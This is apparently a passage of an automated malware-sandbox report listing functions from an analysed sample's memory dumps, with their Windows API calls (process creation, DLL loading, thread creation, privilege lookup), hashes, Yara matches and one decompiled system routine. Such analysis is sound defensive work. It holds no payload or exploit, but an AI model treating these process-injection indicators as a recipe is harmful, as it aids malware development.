                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 5f328e3b7ab4802a74ac13e6898d01ae03165d6f1fd64bbb53ffeb1b46c72fac
                                                                                                  • Instruction ID: 78e5751c51104fade4d34902378893d5d02fae6abff060ebd7446a6e0a1251e9
                                                                                                  • Opcode Fuzzy Hash: 5f328e3b7ab4802a74ac13e6898d01ae03165d6f1fd64bbb53ffeb1b46c72fac
                                                                                                  • Instruction Fuzzy Hash: 631110B2600108BFDB14DF98DC80DEB77A9AF8C354F118258FA1DA7341CA30ED528BA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8446, Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00AA3506,?,00AA3C7F,00AA3C7F,?,00AA3506,?,?,?,?,?,00000000,00000000,?), ref: 00AA84AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: d4a0ef90822b12b5ded95632c00f648e5ce0c7c285e10b124edf072937753477
                                                                                                  • Instruction ID: f9cde72f7557afa8c0f67e18e72fb2f7c68e98167dec007a7c40a8728e0ddd03
                                                                                                  • Opcode Fuzzy Hash: d4a0ef90822b12b5ded95632c00f648e5ce0c7c285e10b124edf072937753477
                                                                                                  • Instruction Fuzzy Hash: 79019EB26002046BDB18EF98DC84DE777ACEF88310F008559FA489B381CA35ED11CBE0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00A99B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A99B82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load
                                                                                                  • String ID:
                                                                                                  • API String ID: 2234796835-0
                                                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction ID: 75beb4a4a7164b9f4fabd6765e617a44b70aa7618af571716881ceaf9469580a
                                                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                  • Instruction Fuzzy Hash: 7C0100B5E4020DBBDF10DBA4DD42F9EB3B89B54308F004195A90897181F635EB14CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AA8584
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateInternalProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2186235152-0
                                                                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                  • Instruction ID: 8272c3f5e6da646ec86d9d5852e4e4dbb8e71533419d35364d83c78938a63aa8
                                                                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                  • Instruction Fuzzy Hash: 7D01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA7000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A9CCC0,?,?), ref: 00AA703C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                                  • Instruction ID: 80f583bb0d0cc3fd1b2026bf5c708cb874283bd0d1c1719e9699eaef52dabb84
                                                                                                  • Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
                                                                                                  • Instruction Fuzzy Hash: 4CE092333803143AE7306599AC03FABB39CDB82B20F140026FA4DEB2C1D695F90142A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA6FF3, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A9CCC0,?,?), ref: 00AA703C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 2641ac046e3efb53b3cc502f352bb4151f6825f11c3262ba12b5620010cc627c
                                                                                                  • Instruction ID: 18f560c5522fb9c4c8f918ff6f7b9de1d77e2f4f721a2fe153e370fe2ef14b77
                                                                                                  • Opcode Fuzzy Hash: 2641ac046e3efb53b3cc502f352bb4151f6825f11c3262ba12b5620010cc627c
                                                                                                  • Instruction Fuzzy Hash: E1F0EC337803103AD73055689C03FABB7A89F92710F14412AF549BB2C1D7A5F94146D4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8611, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A9CF92,00A9CF92,?,00000000,?,?), ref: 00AA8650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 5f1d9126bdba69ba33057b26b4456c56b98c26a775afaa96450aeca6806896bf
                                                                                                  • Instruction ID: 7ede77ea943a391d4d3de1ea3ca4a6d19b52a7e0c0ab5fde1ac8e654b8ea0e00
                                                                                                  • Opcode Fuzzy Hash: 5f1d9126bdba69ba33057b26b4456c56b98c26a775afaa96450aeca6806896bf
                                                                                                  • Instruction Fuzzy Hash: 69F030756002046FDB10EF54D845ED737A8AF8A750F428154FE5857252DA34AD25CBF1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00AA3506,?,00AA3C7F,00AA3C7F,?,00AA3506,?,?,?,?,?,00000000,00000000,?), ref: 00AA84AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                  • Instruction ID: 9e3f1720975838e17aaf250fae50ed5b9158a8e92de46bd262972188701aaebc
                                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                  • Instruction Fuzzy Hash: 3FE012B1200208ABDB14EF99CC45EA777ACAF88650F118558BA085B282CA30F9108AF0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A9CF92,00A9CF92,?,00000000,?,?), ref: 00AA8650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                  • Instruction ID: 833a8cb0c7238d7ec41f8a9eb59c887e01e6674ce3ee0747046deb71e34091a6
                                                                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                  • Instruction Fuzzy Hash: 48E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BA0857281CA34E8108BF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00A9D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNEL32(00008003,?,?,00A97C63,?), ref: 00A9D42B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2340568224-0
                                                                                                  • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                  • Instruction ID: e80fcd8573e1d92c85782642431bc6e72aca8d64cf79c3010864d567d3c3a9e0
                                                                                                  • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                  • Instruction Fuzzy Hash: B5D0A7767903043BEE10FBE49C03F2672CD9B45B00F494064FA48D73C3EA60F5004161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0339967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                                                                                                  • Instruction ID: 4cc251b976045ee1f59c70f1e13a799a76af6b9e7dc4da638bf6b4966d8c0fa4
                                                                                                  • Opcode Fuzzy Hash: 283bbe6d6a08513676cf6d54235ba233a88cffd860e5a1e3875bad0ee3ae45b0
                                                                                                  • Instruction Fuzzy Hash: 88B09B719014C5D5EA11D7654A487177904B7D0751F56C0A6D1020681A4778C091F5B5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 033EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 53%
                                                                                                  			E033EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0339CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E033E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E033E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                  0x033efdda
                                                                                                  0x033efde2
                                                                                                  0x033efde5
                                                                                                  0x033efdec
                                                                                                  0x033efdfa
                                                                                                  0x033efdff
                                                                                                  0x033efe0a
                                                                                                  0x033efe0f
                                                                                                  0x033efe17
                                                                                                  0x033efe1e
                                                                                                  0x033efe19
                                                                                                  0x033efe19
                                                                                                  0x033efe19
                                                                                                  0x033efe20
                                                                                                  0x033efe21
                                                                                                  0x033efe22
                                                                                                  0x033efe25
                                                                                                  0x033efe40

                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033EFDFA
                                                                                                  Strings
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033EFE2B
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033EFE01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                  • API String ID: 885266447-3903918235
                                                                                                  • Opcode ID: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                                                                                                  • Instruction ID: fb9619a674fe901cd7bbc96dabc59636526f6d57f9f21b39f23fee0af9d960cd
                                                                                                  • Opcode Fuzzy Hash: 9ee0e725b3d2598902fcb902bb7e645ecfd0cfda4ade2e218592fc0ddc68b213
                                                                                                  • Instruction Fuzzy Hash: 7CF0F676600211BFEA209A45DC82F23BB5AEB85730F154315F6285A5E1DAA2FC3096F0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%